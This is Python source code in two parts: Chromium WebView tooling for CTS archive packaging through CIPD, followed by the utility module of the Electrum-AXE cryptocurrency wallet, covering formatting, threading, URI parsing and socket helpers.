os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
TOOLS_DIR = os.path.join('android_webview', 'tools')
CONFIG_FILE = os.path.join('cts_config', 'webview_cts_gcs_path.json')
CONFIG_PATH = os.path.join(SRC_DIR, TOOLS_DIR, CONFIG_FILE)
CIPD_FILE = os.path.join('cts_archive', 'cipd.yaml')
CIPD_PATH = os.path.join(SRC_DIR, TOOLS_DIR, CIPD_FILE)
DEPS_FILE = 'DEPS'
TEST_SUITES_FILE = os.path.join('testing', 'buildbot', 'test_suites.pyl')
# Android desserts that are no longer receiving CTS updates at
# https://source.android.com/compatibility/cts/downloads
# Please update this list as more versions reach end-of-service.
END_OF_SERVICE_DESSERTS = ['M']
CTS_DEP_NAME = 'src/android_webview/tools/cts_archive'
CTS_DEP_PACKAGE = 'chromium/android_webview/tools/cts_archive'
CIPD_REFERRERS = [DEPS_FILE, TEST_SUITES_FILE]
_GENERATE_BUILDBOT_JSON = os.path.join('testing', 'buildbot',
'generate_buildbot_json.py')
_ENSURE_FORMAT = """$ParanoidMode CheckIntegrity
@Subdir cipd
{} {}"""
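# Rendered, the ensure file built from _ENSURE_FORMAT looks like the sketch below
# (the instance id is an illustrative placeholder):
#   $ParanoidMode CheckIntegrity
#   @Subdir cipd
#   chromium/android_webview/tools/cts_archive <instance-id>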
_ENSURE_SUBDIR = 'cipd'
_RE_COMMENT_OR_BLANK = re.compile(r'^ *(#.*)?$')
class CTSConfig(object):
"""Represents a CTS config file."""
def __init__(self, file_path=CONFIG_PATH):
"""Constructs a representation of the CTS config file.
Only read operations are provided by this object. Users should edit the
file manually for any modifications.
Args:
file_path: Path to file.
"""
self._path = os.path.abspath(file_path)
with open(self._path) as f:
self._config = json.load(f)
def get_platforms(self):
return sorted(self._config.keys())
def get_archs(self, platform):
return sorted(self._config[platform]['arch'].keys())
def iter_platform_archs(self):
for p in self.get_platforms():
for a in self.get_archs(p):
yield p, a
def get_cipd_zip(self, platform, arch):
return self._config[platform]['arch'][arch]['filename']
def get_origin(self, platform, arch):
return self._config[platform]['arch'][arch]['_origin']
def get_origin_zip(self, platform, arch):
return os.path.basename(self.get_origin(platform, arch))
def get_apks(self, platform):
return sorted([r['apk'] for r in self._config[platform]['test_runs']])
class CTSCIPDYaml(object):
"""Represents a CTS CIPD yaml file."""
RE_PACKAGE = r'^package:\s*(\S+)\s*$'
RE_DESC = r'^description:\s*(.+)$'
RE_DATA = r'^data:\s*$'
RE_FILE = r'^\s+-\s+file:\s*(.+)$'
# TODO(crbug.com/1049432): Replace with yaml parser
@classmethod
def parse(cls, lines):
result = {}
for line in lines:
if len(line) == 0 or line[0] == '#':
continue
package_match = re.match(cls.RE_PACKAGE, line)
if package_match:
result['package'] = package_match.group(1)
continue
desc_match = re.match(cls.RE_DESC, line)
if desc_match:
result['description'] = desc_match.group(1)
continue
if re.match(cls.RE_DATA, line):
result['data'] = []
if 'data' in result:
file_match = re.match(cls.RE_FILE, line)
if file_match:
result['data'].append({'file': file_match.group(1)})
return result
def __init__(self, file_path=CIPD_PATH):
"""Constructs a representation of CTS CIPD yaml file.
Note the file won't be modified unless write is called
with its path.
Args:
file_path: Path to file.
"""
self._path = os.path.abspath(file_path)
self._header = []
# Read header comments
with open(self._path) as f:
for l in f.readlines():
if re.match(_RE_COMMENT_OR_BLANK, l):
self._header.append(l)
else:
break
# Read yaml data
with open(self._path) as f:
self._yaml = CTSCIPDYaml.parse(f.readlines())
def get_file_path(self):
"""Get full file path of yaml file that this was constructed from."""
return self._path
def get_file_basename(self):
"""Get base file name that this was constructed from."""
return os.path.basename(self._path)
def get_package(self):
"""Get package name."""
return self._yaml['package']
def clear_files(self):
"""Clears all files in file (only in local memory, does not modify file)."""
self._yaml['data'] = []
def append_file(self, file_name):
"""Add file_name to list of files."""
self._yaml['data'].append({'file': str(file_name)})
def remove_file(self, file_name):
"""Remove file_name from list of files."""
old_file_names = self.get_files()
new_file_names = [name for name in old_file_names if name != file_name]
self._yaml['data'] = [{'file': name} for name in new_file_names]
def get_files(self):
"""Get list of files in yaml file."""
return [e['file'] for e in self._yaml['data']]
def write(self, file_path):
"""(Over)write file_path with the cipd.yaml representation."""
dir_name = os.path.dirname(file_path)
if not os.path.isdir(dir_name):
os.makedirs(dir_name)
with open(file_path, 'w') as f:
f.writelines(self._get_yamls())
def _get_yamls(self):
"""Return the cipd.yaml file contents of this object."""
output = []
output += self._header
output.append('package: {}\n'.format(self._yaml['package']))
output.append('description: {}\n'.format(self._yaml['description']))
output.append('data:\n')
for d in sorted(self._yaml['data'], key=operator.itemgetter('file')):
output.append(' - file: {}\n'.format(d.get('file')))
return output
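# Sketch of the cipd.yaml shape that CTSCIPDYaml.parse understands and the dict it
# produces (file names and description are illustrative):
#
#   package: chromium/android_webview/tools/cts_archive
#   description: Android CTS archives for WebView
#   data:
#     - file: arm64/M/android-cts-arm64.zip
#
# parse() on the lines above would return:
#   {'package': 'chromium/android_webview/tools/cts_archive',
#    'description': 'Android CTS archives for WebView',
#    'data': [{'file': 'arm64/M/android-cts-arm64.zip'}]}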
def cipd_ensure(package, version, root_dir):
"""Ensures CIPD package is installed at root_dir.
Args:
package: CIPD name of package
version: Package version
root_dir: Directory to install package into
"""
def _createEnsureFile(package, version, file_path):
with open(file_path, 'w') as f:
f.write(_ENSURE_FORMAT.format(package, version))
def _ensure(root, ensure_file):
ret = cmd_helper.RunCmd(
['cipd', 'ensure', '-root', root, '-ensure-file', ensure_file])
if ret:
      raise IOError('Error while running cipd ensure: ' + str(ret))
with tempfile.NamedTemporaryFile() as f:
_createEnsureFile(package, version, f.name)
_ensure(root_dir, f.name)
def cipd_download(cipd, version, download_dir):
"""Downloads CIPD package files.
This is different from cipd ensure in that actual files will exist at
download_dir instead of symlinks.
Args:
cipd: CTSCIPDYaml object
version: Version of package
download_dir: Destination directory
"""
package = cipd.get_package()
download_dir_abs = os.path.abspath(download_dir)
if not os.path.isdir(download_dir_abs):
os.makedirs(download_dir_abs)
with tempfile_ext.NamedTemporaryDirectory() as workDir, chdir(workDir):
cipd_ensure(package, version, '.')
for file_name in cipd.get_files():
src_path = os.path.join(_ENSURE_SUBDIR, file_name)
dest_path = os.path.join(download_dir_abs, file_name)
dest_dir = os.path.dirname(dest_path)
if not os.path.isdir(dest_dir):
os.makedirs(dest_dir)
ret = cmd_helper.RunCmd(['cp', '--reflink=never', src_path, dest_path])
if ret:
        raise IOError('Error copying file from ' + file_name + ' to ' + dest_path)
def filter_cts_file(cts_config, cts_zip_file, dest_dir):
"""Filters out non-webview test apks from downloaded CTS zip file.
Args:
cts_config: CTSConfig object
cts_zip_file: Path to downloaded CTS zip, retaining the original filename
dest_dir: Destination directory to filter to, filename will be unchanged
"""
for p in cts_config.get_platforms():
for a in cts_config.get_archs(p):
o = cts_config.get_origin(p, a)
base_name = os.path.basename(o)
if base_name == os.path.basename(cts_zip_file):
filterzip(cts_zip_file, cts_config.get_apks(p),
os.path.join(dest_dir, base_name))
return
raise ValueError('Could not find platform and arch for: ' + cts_zip_file)
class ChromiumRepoHelper(object):
"""Performs operations on Chromium checkout."""
def __init__(self, root_dir=SRC_DIR):
self._root_dir = os.path.abspath(root_dir)
self._cipd_referrers = [
os.path.join(self._root_dir, p) for p in CIPD_REFERRERS
]
@property
def cipd_referrers(self):
return self._cipd_referrers
@property
def cts_cipd_package(self):
return CTS_DEP_PACKAGE
def get_cipd_dependency_rev(self):
"""Return CTS CIPD revision in the checkout's DEPS file."""
deps_file = os.path.join(self._root_dir, DEPS_FILE)
# Use the gclient command instead of gclient_eval since the latter is not
# intended for direct use outside of depot_tools.
cmd = [
'gclient', 'getdep', '--revision',
'%s:%s' % (CTS_DEP_NAME, CTS_DEP_PACKAGE), '--deps-file', deps_file
]
env = os.environ
# Disable auto-update of depot tools since update_depot_tools may not be
# available (for example, on the presubmit bot), and it's probably best not
# to perform surprise updates anyways.
env.update({'DEPOT_TOOLS_UPDATE': '0'})
status, output, err = cmd_helper.GetCmdStatusOutputAndError(cmd, env=env)
if status != 0:
raise Exception('Command "%s" failed: %s' % (' '.join(cmd), err))
return output.strip()
def update_cts_cipd_rev(self, new_version):
"""Update references to CTS CIPD revision in checkout.
Args:
new_version: New version to use
"""
old_version = self.get_cipd_dependency_rev()
for path in self.cipd_referrers:
replace_cipd_revision(path, old_version, new_version)
def git_status(self, path):
"""Returns canonical git status of file.
Args:
path: Path to file.
Returns:
Output of git status --porcelain.
"""
with chdir(self._root_dir):
output = cmd_helper.GetCmdOutput(['git', 'status', '--porcelain', path])
return output
def update_testing_json(self):
"""Performs generate_buildbot_json.py.
Raises:
IOError: If generation failed.
"""
with chdir(self._root_dir):
ret = cmd_helper.RunCmd(['python', _GENERATE_BUILDBOT_JSON])
if ret:
        raise IOError('Error while running generate_buildbot_json.py')
def rebase(self, *rel_path_parts):
"""Construct absolute path from parts relative to root_dir.
Args:
rel_path_parts: Parts of the root relative path.
Returns:
The absolute path.
"""
return os.path.join(self._root_dir, *rel_path_parts)
def replace_cipd_revision(file_path, old_revision, new_revision):
"""Replaces cipd revision strings in file.
Args:
file_path: Path to file.
old_revision: Old cipd revision to be replaced.
new_revision: New cipd revision to use as replacement.
Returns:
Number of replaced occurrences.
Raises:
IOError: If no occurrences were found.
"""
with open(file_path) as f:
contents = f.read()
num = contents.count(old_revision)
if not num:
raise IOError('Did not find old CIPD revision {} in {}'.format(
old_revision, file_path))
newcontents = contents.replace(old_revision, new_revision)
with open(file_path, 'w') as f:
f.write(newcontents)
return num
@contextlib.contextmanager
def chdir(dirPath):
"""Context manager that changes working directory."""
cwd = os.getcwd()
os.chdir(dirPath)
try:
yield
finally:
os.chdir(cwd)
def filterzip(inputPath, pathList, outputPath):
"""Copy a subset of files from input archive into output archive.
Args:
inputPath: Input archive path
pathList: List of file names from input archive to copy
outputPath: Output archive path
"""
with zipfile.ZipFile(os.path.abspath(inputPath), 'r') as inputZip,\
zipfile.ZipFile(os.path.abspath(outputPath), 'w') as outputZip,\
tempfile_ext.NamedTemporaryDirectory() as workDir,\
chdir(workDir):
for p in pathList:
inputZip.extract(p)
outputZip.write(p)
def download(url, destination):
"""Asynchronously download url to path specified by destination.
Args:
url: Url location of file.
destination: Path where file should be saved to.
If destination parent directories do not exist, they will be created.
Returns the download thread which can then be joined by the caller to
wait for download completion.
"""
dest_dir = os.path.dirname(destination)
if not os.path.isdir(dest_dir):
os.makedirs(dest_dir)
if six.PY2:
retrieve_target = urllib.urlretrieve
else:
retrieve_target = urllib.request.urlretrieve
t = threading.Thread(target=retrieve_target, args=(url, destination))
t.start()
return t
def update_cipd_package(cipd_yaml_path):
"""Updates the CIPD package specified by cipd_yaml_path.
Args:
cipd_yaml_path: Path of cipd yaml specification file
"""
cipd_yaml_path_abs = os.path.abspath(cipd_yaml_path)
with chdir(os.path.dirname(cipd_yaml_path_abs)),\
tempfile.NamedTemporaryFile() as jsonOut:
ret = cmd_helper.RunCmd([
'cipd', 'create', '-pkg-def', cipd_yaml_path_abs, '-json-output',
jsonOut.name
])
if ret:
raise IOError('Error during cipd create.')
return json.load(jsonOut)['result']['instance_id']
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'AXE':8, 'mAXE':5, 'uAXE':2, 'haks':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['AXE', 'mAXE', 'uAXE', 'haks'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "AXE"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "AXE" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Haks(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " AXE"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
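# Usage sketch (illustrative): the decorator reports the wall-clock time of each call
# through print_error, so output only appears when verbosity is enabled:
#
#   @profiler
#   def load_transactions(path):
#       ...
#   # a call then logs something like "[profiler] load_transactions 0.0123"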
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.axe.electrum.electrum_axe'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-axe'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum-AXE datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    Cast a string to a bytes-like object; bytearray input is copied to bytes (kept for python2 compatibility).
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-axe")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-AXE")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-AXE")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
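# Worked examples (assuming the locale decimal point is "." and default arguments):
#   format_satoshis(1234500000)               -> "12.345"
#   format_satoshis(1234500000, num_zeros=2)  -> "12.345"   (already has >= 2 decimals)
#   format_satoshis(-50000, is_diff=True)     -> "-0.0005"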
FEERATE_PRECISION = 0 # num fractional decimal places for haks/kB fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return '%d' % round(fee)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'AXExplorer': ('http://207.246.65.114:3001/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'AXExplorer': ('http://207.246.65.114:3002/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'AXExplorer')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a AXE address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'axe':
raise Exception("Not a AXE URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid AXE address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
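# Illustrative example (address and amounts are hypothetical; assumes the address
# passes bitcoin.is_address() and COIN == 10**8):
#   parse_URI("axe:Xabc...?amount=1.5&message=donation")
#   -> {'address': 'Xabc...', 'amount': 150000000,
#       'message': 'donation', 'memo': 'donation'}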
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='axe', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
return map(utfify, arg)
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
